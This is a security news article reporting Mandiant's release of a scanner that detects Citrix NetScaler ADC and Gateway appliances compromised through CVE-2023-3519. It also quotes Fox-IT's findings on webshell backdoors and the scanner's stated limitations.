As active attacks against the Citrix NetScaler ADC and Gateway vulnerability (CVE-2023-3519) disclosed last month, researchers at Mandiant have released a new tool that can spot potentially compromised appliances.
The tool is based on information that Mandiant and Citrix specialists have gathered during incident response engagements in the last few weeks, and contains a group of indicators of compromise. It will scan appliances to look for specific things that are known to be associated with post-exploitation activity on compromised devices, including suspicious running processes, file system paths that could be malware, suspicious commands in the shell history, and files with suspicious permissions or ownership.
The Citrix vulnerability became public in mid-July, but attackers have been exploiting it as a zero day for several weeks beforehand. Multiple attack groups have targeted the bug, which allows unauthenticated remote code execution. There is public exploit code available, too, which has made things even more dangerous for organizations running affected devices. The vulnerability affects the Citrix NetScaler ADC and Gateway products, and researchers last week found more than 7,000 vulnerable devices online. On Tuesday, Dutch security firm Fox-IT said it had found nearly 2,000 Citrix NetScaler appliances that have been backdoored as a result of exploitation of this bug.
"An adversary appears to have exploited CVE-2023-3519 in an automated fashion, placing webshells on vulnerable NetScalers to gain persistent access. The adversary can execute arbitrary commands with this webshell, even when a NetScaler is patched and/or rebooted. At the time of writing, more than 1900 NetScalers remain backdoored. Using the data supplied by Fox-IT, the Dutch Institute of Vulnerability Disclosure has notified victims," Fox-IT said.
Mandiant’s scanner is designed to identify potentially compromised devices, but it isn’t a panacea. It does not remove any existing malware or webshells, and organizations with affected devices should still install the available Citrix updates.
“The goal of the scanner is to analyze available log sources and system forensic artifacts to identify evidence of successful exploitation of CVE-2023-3519,” Mandiant said in the description of the tool.
“There are limitations in what the tool will be able to accomplish, and therefore, executing the tool should not be considered a guarantee that a system is free of compromise. For example, log files on the system with evidence of compromise may have been truncated or rolled, the system may have been rebooted, an attacker may have tampered with the system to remove evidence of compromise and/or installed a rootkit that masks evidence of compromise.”
The Mandiant scanner is available on GitHub.